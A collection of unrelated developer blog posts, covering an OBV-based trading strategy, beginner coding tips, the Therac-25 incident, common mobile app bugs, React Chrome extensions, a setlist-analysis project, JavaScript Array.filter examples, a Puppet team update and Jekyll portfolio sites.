From the above principle of energy tide, we can try to build a trading strategy based on energy tide. Taking the simplest moving average as an example, we can get the moving average of multiple energy tides by averaging the energy tide values. The energy tide can describe the volume very well, but it can't describe the price, so here is a representative indicator: the average is the fluctuation range (ATR), which can reflect the price fluctuations over a period of time. Here is the logic of the entire strategy:
- First calculate the energy tide (OBV)
- Then calculate the true fluctuation range (ATR)
- Then calculate the moving average of the two energy tides
- Long position open: two moving averages upward, and the slow one up-cross the fast one
- Short position open: two moving averages downward, and the slow one down-cross the fast one
- Long position close, two moving averages downward, or the slow one down-cross the fast one
- Short position close, two moving averages upward, or the slow one up-cross the fast one
## Based on the energy tide trading strategy code
Through the above trading logic, we can build this strategy on the FMZ Quant quantitative trading platform. Let's use the My language as an example. Follow these steps: fmz.com > Login > Dashboard > Strategy > New Strategy > Click the drop-down box on the top-left corner to select My language, start writing the strategy, and pay attention to the comments in the code below.
```
N:=10;
OBV:=SUM(IFELSE(CLOSE>REF(CLOSE,1),VOL,IFELSE(CLOSE<REF(CLOSE,1),-VOL,0)),0);
TR:=MAX(MAX((HIGH-LOW), ABS(REF(CLOSE,1)-HIGH)), ABS(REF(CLOSE,1)-LOW));
ATR: =MA(TR,N);
B: EMA2 (OBV*ATR, N);
D: EMA2 (OBV*ATR, N*2);
B>REF(B,1) && D>REF(D,1) && B>D,BK;
B<REF(B,1) || D<REF(D,1) || B<D,SP;
B<REF(B,1) && D<REF(D,1) && B<D,SK;
B>REF(B,1) || D>REF(D,1) || B>D,BP;
AUTOFILTER;
```
## Strategy backtest
The backtest environment is as follows:
- Trading variety: rebar index
- Time: March 27, 2009 ~ July 31, 2019
- Cycle: one hour
- Slippage: 2 pips for opening and closing positions
- Fee: 2 times of the normal exchange rate
**Fund Curve**

## Copy strategy source code
For more about this strategy, please click: https://www.fmz.com/strategy/159997
## End
In fact, just an energy tide does not produce an effective buying and selling signal, because the price will change greatly in the early or middle stage of the rising and falling. Once the price trend is established, most traders will tend to agree. At this point, the purchase has been bought, and the sale is also sold. At this time, although the price is rising, the transaction volume will gradually shrink, which means that the shrinking volume does not mean that the market trend is coming to an end.
Therefore, the energy tide is suitable for the short-term strategy, and it will be counterproductive in the medium and long-term strategy. In addition, the energy tide cannot be used alone in actual combat, but is used as an auxiliary method as much as possible. Especially in the immature trading market, it is necessary to improve accordingly in order to exert its true strength.
From: https://blog.mathquant.com/2019/08/02/detailed-usage-and-practical-skills-of-energy-tideobv-indicator-in-quantitative-trading.html | fmzquant |
1,879,756 | 11 Useful Tips for New Coders and Developers in 2024 | Starting a career or hobby in coding can feel intimidating. This field is ever-evolving and filled... | 0 | 2024-06-07T01:19:46 | https://dev.to/cynthia_kramer_db0fcf897f/11-useful-tips-for-new-coders-and-developers-in-2024-3442 | coding, webdev | Starting a career or hobby in coding can feel intimidating. This field is ever-evolving and filled with both endless possibilities and endless challenges. Where do you start?
The following tips will serve as your compass, guiding you into this shiny new world and helping you to develop a successful career or accomplish your goals.
Let’s get started.
## Start With the Basics
The first thing to do when you decide to learn to code is to pick a language to start with. There are so many out there, so it can be a little intimidating to know where to begin. The best approach is to do minimal research and then choose a language that you’re interested in or the best one for your purposes.
Once you choose the first language you will learn, you should learn the basics. The best way to do this is by building projects. Choose a few simple projects to work on and learn as you go along.
## Practice Regularly
Whenever you’re learning something new, developing a habit will help you carve out time for it. A daily coding habit will help you learn consistently, make steady progress on projects, and accomplish your goals more quickly. Of course, if your schedule doesn’t allow for this, you can develop a weekly habit instead. Just make sure you’re setting aside time once or twice a week to learn and work on projects.
## Break Down Projects and Problems
The projects you choose to work on can seem intimidating at first, especially when you’re just starting out. Breaking your projects down into small, manageable steps will help you make steady progress. Instead of looking at the project as a whole, focus on each step as you go.
You can take the same approach with problems that come up. Break it down into small steps you can take and before you know it, you’ll have moved past the roadblock and on to the next one.
## Try to Solve Problems Yourself First, But Don’t Be Afraid to Ask for Help
Solving coding problems yourself is exhilarating and teaches you how to solve it next time. Experiment with your code and think outside of the box until you find the solution.
But if you’ve hit a wall, don’t struggle alone. There are so many resources out there for finding answers to problems. Start with Google, then ask questions in forums and online communities. Someone may be facing the same challenge or have come up with something you hadn’t thought of.
## Study Others’ Code
Reading through others’ code can help you see what works and what doesn’t. It can also give you ideas for projects to try or things to implement in your code.
However, be careful here. Don’t copy and paste someone else’s code to use for yourself. Rather, learn what they did and why they did it. This can teach you new techniques and solutions. Use the lessons, not the specific code.
## Learn to Debug and Fix Errors
Learning to fix things in your code is an important skill that you should learn early on. Recognize when something is not working (testing can help with this) and determine how to fix it.
This is useful whether you are building projects for yourself or looking to get hired as a developer. Any employer or client will want you to be able to fix your own code and turn in work that doesn’t need to be corrected by someone else. This is especially true when building websites and apps for clients: they expect it to not have problems after you’ve turned it over to them.
## Always Learn New Things
Web development, coding, software development, and related fields are always growing, changing, and evolving. It’s important for you to evolve with them. There is always something new to learn: techniques, technologies, solutions for common problems, etc. Stay curious and you’ll always be up-to-date in your field.
## Type Out Code Instead of Copying and Pasting
We’ve covered not taking others’ code, but now I want to talk about learning resources. Courses and tutorials are wonderful ways to get started and learn new things. And many of them run you through projects that you can build and add to your portfolio.
However, I would warn against simply copying and pasting this code. That might be the easy, quick way to build a portfolio, but it’s not the best way to learn. Type out the code yourself and really try to understand why that particular piece of code is there. Then you can tweak the project for yourself as you decide to add elements or take something out.
## Solve Real-World Problems
Again, courses and tutorials are great for suggesting projects to add to your portfolio. But instead of the standard calculators and Google clones that are in everyone else’s portfolio, try to come up with something that solves a real problem. The additional benefit is that you might be able to turn this into a real product.
How do you come up with ideas for problems to solve? Look at the things that frustrate you or someone you know. Then take a look at the solutions that already exist. Is there room to improve these solutions? Is there something that you would add or get rid of? Build that ideal solution that you would use yourself.
## Be More Social
You might think that coding is a solitary activity, but it doesn’t have to be. There are so many communities out there for coders and developers, from social media groups to forums and even in-person meetups. Find a few that you like and become involved in the group. This means sharing your successes and failures, talking about things you’ve learned, asking questions, and helping others.
## Take Breaks
Staring at your code all day can lead you to become more tired and frustrated, especially when you hit that inevitable wall. Taking breaks will rest both your eyes and your mind, allowing you to return to your work refreshed. When I take a break from my work, I always find that new ideas occur to me that would not have if I continued to push through. Fresh eyes bring fresh perspective.
You can take a short break, like eating something or stretching. Or you can take a longer break to walk outside. Even taking a shower or going to sleep at the end of the day will help refresh you and give you new ideas to work on in the morning. Just remember to jot those ideas down!
## Takeaway
There was a lot of information in this post, but all these tips can be pretty much summed up like this:
**Be patient, be persistent, and be social.**
Remember these three things and you’ll find yourself with a successful and enjoyable career or hobby in the world of coding. | cynthia_kramer_db0fcf897f |
1,879,755 | The incident that highlighted the importance of code quality | Have you heard about the "Therac-25 incident"? The Therac-25 was a radiation therapy... | 0 | 2024-06-07T01:13:56 | https://dev.to/mmvergara/the-incident-that-highlighted-the-importance-of-code-quality-454d | programming, coding | ### Have you heard about the "Therac-25 incident"?
The Therac-25 was a radiation therapy machine used for cancer treatment in the 1980s.
The software was designed to control the radiation dosage delivered to patients, but a `race condition` in the software led to massive overdoses of radiation being administered to patients, causing severe injuries and even death.
Yeah just because of a bad code.
### But what can we take from it?
**Testing:** Some very small apps doesn't really need testing, but when we're dealing with user's privacy and security especially people lives, should you do testing was never a question.
**Safety-Critical Design Practices:** The importance of applying safety-critical design practices, such as redundant systems, fail-safes, and thorough risk analysis, especially in systems that can cause information leakage or harm if they malfunction.
| mmvergara |
1,868,789 | Top 15 Common Bugs in Mobile Apps and How to Fix Them | As experienced smartphone users, we have developed an eye for spotting defects in applications... | 0 | 2024-06-07T01:11:06 | https://dev.to/wetest/top-15-common-bugs-in-mobile-apps-and-how-to-fix-them-4ne1 | programming, devops, app, bug | As experienced smartphone users, we have developed an eye for spotting defects in applications quickly. From frustrating interfaces to buttons that cause apps to crash, we have encountered various issues. While it is essential not to overlook the most glaring bugs, our team has compiled a list of common problems to highlight the significance of a mobile engineer's role for both developers and end-users.

# SSL Certificate Handling Flaws
Despite the presence of built-in certificate handling code in iOS and Android, errors can still arise when app developers create their implementations. Exploiting this opportunity, hackers can manipulate the app into accepting counterfeit certificates that resemble the app's legitimate server. As a consequence, the presence of certificate handling flaws introduces vulnerabilities, such as man-in-the-middle attacks, which enable attackers to manipulate and tamper with incoming information.
# Data Leakage
While the mobile operating system provides a certain level of protection, it is not sufficient to prevent determined individuals from examining the internals of mobile apps. Mobile developers must remain vigilant about the fact that mobile apps can be reverse-engineered. This process can potentially expose sensitive information, including leaked data such as API keys, social network API tokens, AWS credentials, and RSA private keys. Developers must prioritize security measures and adopt practices that safeguard against these risks.
# Client-Side Validation
Security issues often arise when developers heavily rely on client-side validation for sensitive actions that require authentication. It is important to note that client-side validation bugs are more commonly found in mobile apps compared to web apps.
Client-side validation, while useful for improving user experience and providing immediate feedback, should never be solely relied upon for security purposes. Important security checks and validations should be performed on the server side to ensure the integrity and confidentiality of sensitive data and to prevent malicious activities.
Developers must prioritize a layered approach to security, implementing both client-side and server-side validation mechanisms, to effectively mitigate security risks and protect against potential vulnerabilities.
# Insecure Direct Object Reference
IDOR vulnerabilities are frequently encountered within the REST API of an application. Sophisticated manipulations by malicious actors allow them to gain unauthorized access to confidential messages belonging to the victim.
# Outdated Vulnerable Components
Despite the prominence of cybersecurity in the digital realm, app developers often overlook the potential vulnerabilities present in the components they utilize. This oversight can manifest in various ways, such as neglecting to promptly address or upgrade the foundational platform, frameworks, and dependencies, as well as failing to thoroughly test the compatibility of updated, upgraded, or patched libraries.
# Compatibility Bugs
In the digital era, it is essential to prioritize ensuring the compatibility of mobile apps with a wide range of devices. However, this task poses a significant challenge due to the multitude of hardware and software functionalities packed into smartphones today, which can be combined in countless unforeseen combinations.

# Inconsistencies in Page Layout Across Devices
When end-users access an app using devices of varying screen sizes, rendering inconsistencies, misalignments, and overlapping can occur. These issues, particularly in e-commerce applications, have the potential to result in substantial revenue losses. It's analogous to a shop window becoming blurry when a potential customer moves closer, potentially detracting them from making a purchase.
# Unnecessary Navigation
If an app requires a guide, it can indicate a fundamental usability problem. Ideally, an app should be intuitive and user-friendly enough that users can navigate and understand its features without the need for explicit instructions or a separate guide. A well-designed app should provide clear and intuitive user interfaces, logical navigation pathways, and appropriate feedback to guide users through the application without confusion or difficulty. However, in some cases, a brief tutorial or onboarding process may be necessary to introduce unique or complex features to users. The key is to strike a balance between simplicity and functionality, ensuring that the app is accessible and understandable for the majority of users without excessive reliance on external guides.
# Lacking Landscape Mode
A well-designed mobile app should be able to adapt seamlessly to both portrait and landscape orientations. Additionally, many experts suggest that different UI approaches should be considered for each orientation, particularly when the app includes video content.
# “Work-as-designed” Performance Issues
Indeed, a group of issues can arise due to flaws in app design. These issues occur because the application operates exactly as intended but the design itself possesses inherent flaws. Some common examples include non-scalable architecture, improper loading techniques, excessive synchronization, and more.
Non-scalable architecture can hinder the app's ability to handle increased user traffic or growing data volumes efficiently. Improper loading techniques may result in slow loading times or an inefficient use of resources. Excessive synchronization can lead to delays or bottlenecks in data processing.
Addressing these design-related issues requires careful planning and consideration during the development process. Developers should strive to create scalable architectures, employ efficient loading techniques, and strike a balance with synchronization to ensure the app functions optimally and provides a seamless user experience.
# Memory-related Issues
Design-related issues in app development can indeed encompass memory leakage, improper caching, and insufficient memory allocation.
Memory leakage occurs when the app does not properly release memory resources, leading to a gradual reduction in available memory over time. Improper caching refers to inefficient or ineffective storage of temporary data, leading to performance degradation or incorrect data retrieval. Insufficient memory allocation can result in application crashes or poor performance due to limited available memory for the app to operate.
Addressing these design issues requires careful memory management practices, implementing efficient caching mechanisms, and ensuring adequate memory allocation for optimal app performance. Developers should prioritize proper memory handling and caching strategies to avoid these detrimental issues in their app design.
# Interfacing Performance Issues
Indeed, a range of issues can be triggered by various factors such as using outdated drivers or libraries, neglecting regular database housekeeping, missing database indexes, or encountering logging issues.
Using outdated drivers or libraries can introduce compatibility issues or security vulnerabilities, impacting the overall functionality and stability of the application. Neglecting regular database housekeeping, such as archiving or purging old data, can lead to increased storage usage, slower database performance, and potential data corruption. Missing database indexes can affect query performance and result in slower response times. Logging issues, such as excessive logging or inadequate error handling, can impact system performance, cause storage bloat, or potentially expose sensitive information.
To mitigate these issues, developers must ensure they are using up-to-date drivers and libraries, maintain regular database housekeeping routines, implement appropriate database indexing strategies, and establish robust logging practices. Proactive monitoring and regular maintenance can help identify and rectify potential issues, ensuring the smooth operation of the application.
# Slow Response Time
Indeed, there are several common reasons why a mobile app may experience slowness. These include:
1. Network latency: Slow network connections or high latency can significantly impact the app's performance.
2. Unoptimized encrypted connections: If encrypted connections are not properly optimized, it can lead to increased overhead and slower data transmission.
3. Sluggish server speed: If the server that the app interacts with is slow in processing requests, it can cause delays in data retrieval or updates.
4. Chatty conversations: Excessive back-and-forth communication between the app and the server, such as making frequent API calls, can introduce delays and impact performance.
5. App overcrowdedness with data: If the app's data storage becomes cluttered or overloaded with excessive data, it can slow down data retrieval and processing operations.
# Crashes
Indeed, apps can crash due to unnoticed bugs, and it is crucial to thoroughly test any added feature or functionality. Testing helps identify and resolve software defects before they affect the end users. By conducting comprehensive testing, including unit testing, integration testing, and user acceptance testing, developers can uncover and fix potential issues that could lead to crashes. Additionally, implementing regular quality assurance processes and utilizing automated testing tools can further enhance the app's stability and reliability.
App development is indeed a complex process and ensuring the quality of your app is crucial for maintaining your reputation and providing a positive user experience. The checklist you provided covers some important aspects of bug detection.
However, here are a few additional points you may want to consider:
1. Test the app on various devices: It's essential to test your app on a wide range of devices to ensure compatibility and functionality across different screen sizes, hardware configurations, and manufacturers.
2. Test different data scenarios: Evaluate how your app handles different data scenarios such as low network connectivity, slow internet speeds, and large data volumes to ensure optimal performance.
3. Test for usability and user experience: Conduct user testing to gather feedback on the app's usability, navigation, and overall user experience. This can help identify and address any potential issues or areas of improvement.
4. Security testing: Verify the app's security features by conducting penetration testing and vulnerability assessments to identify any potential security risks and ensure the app's data protection.
5. Test for edge cases: Test the app under unusual or extreme conditions, such as low battery, low storage space, or high resource usage, to uncover any unexpected bugs or issues.
6. Regression testing: Perform regression testing to ensure that new updates or changes to the app have not caused any previously fixed bugs to resurface.
Remember that the checklist you provided is a starting point, and the specific testing requirements may vary depending on the complexity and functionality of your app. Regular testing and continuous improvement are essential to deliver a high-quality app to your users.
# Conclusion
Mobile app development is a complex process that requires attention to detail and thorough testing. By addressing these top 15 common bugs, developers can deliver high-quality apps that provide a seamless and enjoyable user experience. Prioritizing security, performance optimization, compatibility, and usability will help create apps that meet user expectations and stand out in a competitive market.
To ensure comprehensive testing and bug detection, developers can rely on WeTest Mobile App Testing. WeTest integrates cutting-edge tools such as automated testing, compatibility testing, functionality testing, remote device testing, performance testing, and security testing. With WeTest, developers can cover all testing stages of their apps throughout their entire lifecycle, ensuring optimal performance and reliability.
[For more information, contact WeTest team at → WeTest-All Test in WeTest] (https://wetest.net/?utm_source=dev&utm_medium=forum&utm_content=top-15-common-bugs)
| wetest |
1,879,754 | Chrome Extensions for React Developers | Google developed Google Chrome (or just Chrome), a popular internet browser. One of the reasons... | 0 | 2024-06-07T01:09:48 | https://dev.to/xuanmingl/chrome-extensions-for-react-developers-1c94 | webdev, react, chrome, beginners | Google developed [Google Chrome](https://www.google.com/chrome/) (or just Chrome), a popular internet browser. One of the reasons Chrome browser is the most popular browser for web development is that it has Chrome developer tools out of the box and allows third-party dev tools to be installed to the browser, to provide more capabilities for web development aka React Chrome extension.
#[1. React Developers Tools](https://chrome.google.com/webstore/detail/react-developer-tools/fmkadmapgofadopljbjfkapdkoienihi)
You will get two new tabs in your Chrome DevTools: “⚛️ Components” and “⚛️ Profiler”.
The Components tab shows you the root React components that were rendered on the page, as well as the subcomponents that they ended up rendering.
By selecting one of the components in the tree, you can inspect and edit its current props and state in the panel on the right. In the breadcrumbs, you can inspect the selected component, the component that created it, the component that created that one, and so on.
#[2. Lorem Ipsum Generator](https://chromewebstore.google.com/detail/lorem-ipsum-generator/pglahbfamjiifnafcicdibiiabpakkkb)
Quickly generate Lorem Ipsum placeholder text. Select a desired length and choose between paragraphs, words, bytes or lists.
Elegantly designed and easy to use. The values you enter are stored so that your preferred option will always be immediately available.
#[3. Redux DevTools](https://chromewebstore.google.com/detail/redux-devtools/lmhkpmbekcpmknklioeibfkpmmfibljd)
The extension provides power-ups for your Redux development workflow. Apart from Redux, it can be used with any other architectures which handle the state.
#[4. What Font - font finder](https://chromewebstore.google.com/detail/what-font-font-finder/opogloaldjiplhogobhmghlgnlciebin)
What Font allows you to know the font name, its family, color, style, size, position. Such a great tool to create designed web pages fastly. Now you can simply identify a liked font and select exactly the same for your needs without a long search for a suitable one. This extension supports Google API as a font finder, so you will have info about all popular Google Fonts.
#[5. ColorZilla](https://chromewebstore.google.com/detail/colorzilla/bhlhnicpbhignbdhedgjhgdocnmhomnp)
With ColorZilla you can get a color reading from any point in your browser, quickly adjust this color and paste it into another program. And it can do so much more... | xuanmingl |
1,879,753 | Setlistopedia | Not the best name but a fun project nevertheless. A few months ago I interviewed for a job where I... | 0 | 2024-06-07T01:06:15 | https://dev.to/jakedapper/setlistopedia-3mge | Not the best name but a fun project nevertheless.
A few months ago I interviewed for a job where I was assessed on my knowledge of Node.js. At the time, it was very close to nothing. To prevent this from happening again, I decided to learn it. Around the same time I started listening to the Grateful Dead a lot. While listening to the Grateful Dead, I noticed some patterns in their setlists. I enjoyed hearing how one song would flow into the next across many different shows. Curious if there were more of these patterns in their setlist sequencing, and wanting to learn Node.js, I decided to build a web application which analyzed a band’s setlists. I utilized React, Typescript, Node.js, and Prisma as an ORM for a PostgreSQL database. Computations performed on an artist’s data included the top five songs they ever played, what year they played a particular song the most, and which song is most likely to be played before or after.
While certain parts were easy to ascertain a path to implementation, certain parts were frustratingly difficult. But only some. For instance, I wrote an iterative function which creates a frequency counter for each unique song in a collection of an artist’s setlists. This was easy. But getting comfortable with typescript and the plethora of syntax that follows? That was particularly difficult.
I eventually came around to enjoy the benefits of typescript - I found I could code more efficiently, interacting with pre-defined data structures safely and efficiently. Since my application’s main utility is analyzing data structures, the benefits shone through quickly, however frustrating typescript/eslint’s incessant complaints were. As with most things, it just took some practice.
In order to create statistics on a band’s live performances I needed data to analyze. I knew there was a thorough data source of setlists on a website called SetlistFm. Luckily, they have an API available. I designed the app to allow users to search for an artist they were interested in. When a user searches for an artist, a check on whether said artist is in the database occurs. If the artist was not in the database a series of requests would be sent to SetlistFm.com until all pages of data were ingested and added to the database. The idea was that over time, with more user activity, the database would become more comprehensive and the reliance upon SetlistFm’s API would decrease.
This would have been fine, however, there is a rate limit for requests made to their API. I realized this would cause a decent amount of trouble for my application. It would only take a small number of users to make simultaneous requests to cause 429 response errors to be sent. Initially, after some Google searches and StackOverflow exploration, I thought implementing a retry function with exponential backoff might save a user from these errors. But with the possibility of more and more users making requests, this would still not suffice. I thought about it like water flowing through a pipe with holes in the top of it - at a slow flow rate, all of the water would pass through fine and make it to its destination, but with too much water flowing through the pipe, you’re going to have a mess. As an alternative, I decided to seed my database with a lot of artists’ data using SetlistFm’s API. This would significantly uncouple any reliance upon SetlistFm’s API.
I learned a lot but below I’ve listed some of the things I found to be most interesting.
I learned about utilizing local storage to persist state on a refresh.
I learned about organizing code more efficiently and how to better follow DRY principles. For example, writing basic helper functions and services.
I learned about Domain Driven Design and the importance of naming variables.
I learned how to troubleshoot, debug, and measure efficiency better through a myriad of console.logs and even inspecting memory usage in devTools.
I learned about database architecture and how to be strategic in creating only the tables you need with only the fields you need - the same goes for querying said database.
I learned about creating dynamic URLs which send pertinent information from the client to the server.
| jakedapper | |
1,879,644 | Micrsoft Azure Core Architectural Components | Table of Contents Introduction Core Architectural Components of Azure Introduction... | 0 | 2024-06-07T00:55:22 | https://dev.to/celestina_odili/core-architectural-components-of-azure-3mk7 | devops, cloud, tutorial, beginners | Table of Contents <a name="contents"></a>
[Introduction] (#intro)
[Core Architectural Components of Azure] (#components)
### Introduction <a name="intro"></a>
Architecture is a term used to describe the art of designing. It is the organization of a system in such a way that users can easily access and navigate. The core architectural components of Azure cloud refer to the structural organization of the different parts of Azure cloud platform such that it is not just easy to understand and use but also easy to track and manage resources provisioned and deployed. Understanding how Azure environment is organized is vital as that will aid easy navigation of the platform and of course awesome user experience and value for money.
[back to top] (#contents)
### Core Architectural Components of Azure <a name="components"></a>
<p>There are many components of Azure but here we will focus on the core or fundamental architectural components and also take a look at subscription. The core architectural components of Azure include.
- _Resource Group_
- _Resources_
- _Azure Resource Manager (ARM)_
- _Regions_
- _Availability Zones_
#### Subscription
Azure components are only accessible to Azure account holders, hence the need to talk about subscription. Azure account is subscription-based and require a credit card to sign up. You must have a payment plan inputted through a dollar credit card before completing the account creation process. There is option for pay-as-you-go subscription where you pay only for what you use each month with no form of commitment and cancellation can be done at any time. However, there are some variants of free 12 months subscription for beginners and students. This also require you to input the card details, but you will not be charged until you upgrade to a paid plan. After you have crossed the huddles of creating account and subscription, you can now access the various components and services that Azure offer. Go to https://portal.azure.com/ to sign up.
#### Resource Group
<p>This is a logical container you create for all resources that you want to put together as a group. It is a placeholder that holds related resources together. it can be likened to a folder used to put files together. A resource group can contain resources from multiple regions. Flexible to create and can be created during or before resources creation. It is a component Azure put in place to aid ease of resources management and organization. Resources that are pooled together in a resource group share same life cycle. For instance, deleting a resource group automatically delete all resources therein. while life cycle is key in placing resource in a resource group, it should be noted that what make the most sense to the organization is the main factor.
#### Resources
Resources are individual services that Azure offer. There are many of them. So, whatever your need, there is a resource available to meet it. You only provision the resources you need. The resources could be an infrastructure, a platform or a software. virtual machines, databases, networking, web apps, storage, o365 are a few examples of Azure resources.
#### Azure Resource Manager (ARM)
This is an inbuilt system or service responsible for managing and deploying resources. ARM provides a management layer which make it possible for creation, updating and deleting of resources. Management features like access control, locks, and tags are used to secure and organize resources after deployment. ARM works at the back end to ensure optimal performance of resources. It is more like working behind the scenes to ensure that resources provisioned or deployed are working maximally and are available on demand.
####Regions
<p>They are areas within Azure geography located in different parts of the world where data centers are found. They are intentionally chosen locations and each region has a least three availability zones containing data centers. It is mandatory to choose at least one region for any resource deployed. It is best to choose a region closest to the users.
#### Availability Zones
They are exact locations within a region comprising of one or more data centers. They are independent of one another in terms of facilities- space, power, cooling, networking etc. but serve as back up for each other. Deploying resources in more than one availability zones helps to ensure the benefit of redundancy and reliability. if for any reason there is a crash in one availability zone, the second one picks up automatically and nothing is lost. It is highly recommended that resources be provisioned in 2 or more availability zones.
[back to top] (#contents) | celestina_odili |
1,879,751 | Looking for a web developer for a gig. DM kindly | A post by Brian | 0 | 2024-06-07T00:45:42 | https://dev.to/suterkirop/looking-for-a-web-developer-for-a-gig-dm-kindly-b36 | suterkirop | ||
1,879,748 | 10 Genius Hacks Using Array.filter() That You Must Try | Array filtering in JavaScript is a powerful feature that can be used creatively and... | 0 | 2024-06-07T00:35:10 | https://dev.to/aneeqakhan/10-genius-hacks-using-arrayfilter-that-you-must-try-239f | javascript, webdev, beginners, programming | Array filtering in JavaScript is a powerful feature that can be used creatively and practically.
Here are some innovative uses of the array.filter method:
## 1. Removing Duplicates
```javascript
const numbers = [1, 2, 2, 3, 4, 4, 5];
const uniqueNumbers = numbers.filter((value, index, self) => self.indexOf(value) === index);
// uniqueNumbers: [1, 2, 3, 4, 5]
```
## 2. Finding Prime Numbers
```javascript
const numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10];
const isPrime = num => {
for (let i = 2, s = Math.sqrt(num); i <= s; i++)
if (num % i === 0) return false;
return num > 1;
};
const primeNumbers = numbers.filter(isPrime);
// primeNumbers: [2, 3, 5, 7]
```
## 3. Filtering Objects by Property
```javascript
const users = [
{ name: 'Alice', age: 25 },
{ name: 'Bob', age: 30 },
{ name: 'Charlie', age: 25 }
];
const age25 = users.filter(user => user.age === 25);
// age25: [{ name: 'Alice', age: 25 }, { name: 'Charlie', age: 25 }]
```
## 4. Excluding Falsy Values
```javascript
const values = [0, 1, false, 2, '', 3, null, undefined, 4];
const truthyValues = values.filter(Boolean);
// truthyValues: [1, 2, 3, 4]
```
## 5. Filtering Nested Arrays
```javascript
const nestedArrays = [[1, 2, 3], [4, 5, 6], [7, 8, 9]];
const flattenedAndFiltered = nestedArrays.flat().filter(num => num > 5);
// flattenedAndFiltered: [6, 7, 8, 9]
```
## 6. Filtering Unique Values in Nested Arrays
```javascript
const arrays = [[1, 2, 3], [3, 4, 5], [5, 6, 7]];
const uniqueValues = [...new Set(arrays.flat())];
// uniqueValues: [1, 2, 3, 4, 5, 6, 7]
```
## 7. Filtering by Date Range
```javascript
const events = [
{ name: 'Event 1', date: new Date('2023-01-01') },
{ name: 'Event 2', date: new Date('2023-06-01') },
{ name: 'Event 3', date: new Date('2023-12-01') }
];
const startDate = new Date('2023-01-01');
const endDate = new Date('2023-06-30');
const filteredEvents = events.filter(event => event.date >= startDate && event.date <= endDate);
// filteredEvents: [{ name: 'Event 1', date: new Date('2023-01-01') }, { name: 'Event 2', date: new Date('2023-06-01') }]
```
## 8. Filtering with Multiple Conditions
```javascript
const products = [
{ name: 'Laptop', price: 1000, inStock: true },
{ name: 'Phone', price: 500, inStock: false },
{ name: 'Tablet', price: 300, inStock: true }
];
const availableExpensiveProducts = products.filter(product => product.inStock && product.price > 400);
// availableExpensiveProducts: [{ name: 'Laptop', price: 1000, inStock: true }]
```
## 9. Filtering Array of Strings by Length
```javascript
const words = ['apple', 'banana', 'cherry', 'date'];
const longWords = words.filter(word => word.length > 5);
// longWords: ['banana', 'cherry']
```
## 10. Filtering Non-Numeric Values
```javascript
const mixedValues = [1, 'two', 3, 'four', 5];
const numericValues = mixedValues.filter(value => typeof value === 'number');
// numericValues: [1, 3, 5]
```
Thank you for reading!
Feel free to connect with me on [LinkedIn](https://www.linkedin.com/in/aneeqa-khan-990459135/) or [GitHub](https://github.com/AneeqaKhan).
| aneeqakhan |
1,880,179 | DevX Status Update | Hello Friday! With some of the team heading off on vacation over the next week or so we will continue... | 0 | 2024-06-14T17:34:22 | https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-devx-status-update/ | puppet, community | ---
title: DevX Status Update
published: true
date: 2024-06-07 00:00:00 UTC
tags: puppet,community
canonical_url: https://puppetlabs.github.io/content-and-tooling-team/blog/updates/2024-06-07-devx-status-update/
---
Hello Friday! With some of the team heading off on vacation over the next week or so we will continue to work in the background, if you need anything remember to catch up at our Office Hours session bi-weekly or for anything urgent you can catch us on the Community Slack.
## dsc\_lite Supported Status
As you may have seen last week we announced that we were spending some time on dsc\_lite, it now runs with Puppet 8 and we will be supporting it going forward. This piece of work has now been closed out but always good to send out a reminder.
## PDK Configuration of cert.pem for self-hosted git repos
[Gavin](https://github.com/gavindidrichsen) has spent some time doing some research and providing [documentation](https://github.com/puppetlabs/pdk/pull/1362) on how to manage certificates on self hosted git repos. The work has been merged and can be viewed on the [docs site](https://www.puppet.com/docs/pdk/3.x/pdk_troubleshooting#pdk-failing-to-pull-from-custom-git-server) if it is something that affects you.
## Community Contributions
We’d like to thank the following people in the Puppet Community for their contributions over this past week:
- [`litmusimage#86`](https://github.com/puppetlabs/litmusimage/pull/86): “Add remaining puppet-agent supported ARM64 platforms”, thanks to [h0tw1r3](https://github.com/h0tw1r3)
- [`puppet_litmus#549`](https://github.com/puppetlabs/puppet_litmus/pull/549): “(feature) matrix from metadata v3”, thanks to [h0tw1r3](https://github.com/h0tw1r3)
## New Gem Releases
- [`puppetlabs_spec_helper`](https://rubygems.org/gems/puppetlabs_spec_helper) (`7.3.1`) | puppetdevx |
1,879,747 | Building a Portfolio Website with Jekyll | Introduction In today's digital age, having a strong online presence is crucial for... | 0 | 2024-06-07T00:33:20 | https://dev.to/kartikmehta8/building-a-portfolio-website-with-jekyll-22k | webdev, javascript, beginners, tutorial | ## Introduction
In today's digital age, having a strong online presence is crucial for professionals, especially those in the creative field. One way to showcase your work and skills is by building a portfolio website. While there are various website builders available, one of the popular tools gaining traction is Jekyll. In this article, we will discuss the advantages, disadvantages, and features of using Jekyll to build a portfolio website.
## Advantages of Using Jekyll
1. **Simplified Website Management:** Jekyll is a static website generator, which means it generates HTML files without the use of databases. This eliminates the need to constantly update and manage a server, making it easier to maintain a portfolio website.
2. **Speed and Performance:** As Jekyll websites are purely HTML files, they load faster compared to dynamic websites. This results in better user experience and improved SEO rankings.
3. **Version Control:** Jekyll integrates with Git, allowing you to track changes and revert to previous versions easily. This is especially useful when collaborating with others on the website.
## Disadvantages of Using Jekyll
1. **Limited Dynamic Content:** Jekyll websites are built on static files, so they have limited dynamic content capabilities compared to other website builders.
2. **Steep Learning Curve:** For those not familiar with coding or command-line interface, Jekyll may have a steep learning curve. It requires some technical knowledge to set up and customize the website.
## Features of Jekyll
1. **Customizable Templates:** Jekyll offers various pre-built templates and themes that can be customized according to your brand and style.
2. **Markdown Support:** Jekyll supports Markdown, making it easy to write and format content without having to deal with HTML.
3. **Integration with GitHub Pages:** Jekyll integrates seamlessly with GitHub Pages, allowing you to host your website for free.
### Example of a Jekyll Markdown File
```markdown
---
layout: post
title: "My First Portfolio Project"
date: 2023-06-01
---
Here is the content of my first portfolio project. Markdown makes it easy to add formatted text, images, and links.
```
This example shows how you can create a new post using Markdown in Jekyll. The simplicity of Markdown syntax allows you to focus more on your content and less on the formatting.
## Conclusion
In conclusion, Jekyll is a powerful tool for building a portfolio website with its simplified website management, speed and performance, and version control features. However, it may not be suitable for those without technical knowledge or those looking for more dynamic content. Nevertheless, with its customizable templates and integration with hosting platforms like GitHub, Jekyll offers a great option for showcasing your work and skills to the world. | kartikmehta8 |
